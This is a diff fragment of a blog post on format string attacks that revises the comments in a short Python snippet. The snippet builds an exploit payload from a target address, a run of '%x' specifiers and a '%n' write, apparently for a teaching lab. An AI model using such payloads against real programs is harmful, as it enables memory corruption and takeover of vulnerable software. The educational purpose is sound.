iukadike/blog/_posts/2023-09-10-format-string-attack.md

 # Start input with the memory address of the target variable
 content = (0x080e5068).to_bytes(4,byteorder='little')

-# Append multiple format specifiers to prevent the program from crashing
+# Append format specifiers to prevent the program from crashing
 content += ("%x" * 63).encode('latin-1')

-# Access 0x080b4008 and overwrite it's content
+# Access 0x080e5068 and overwrite it's content
 content += ("%n").encode('latin-1')

 # Append a newline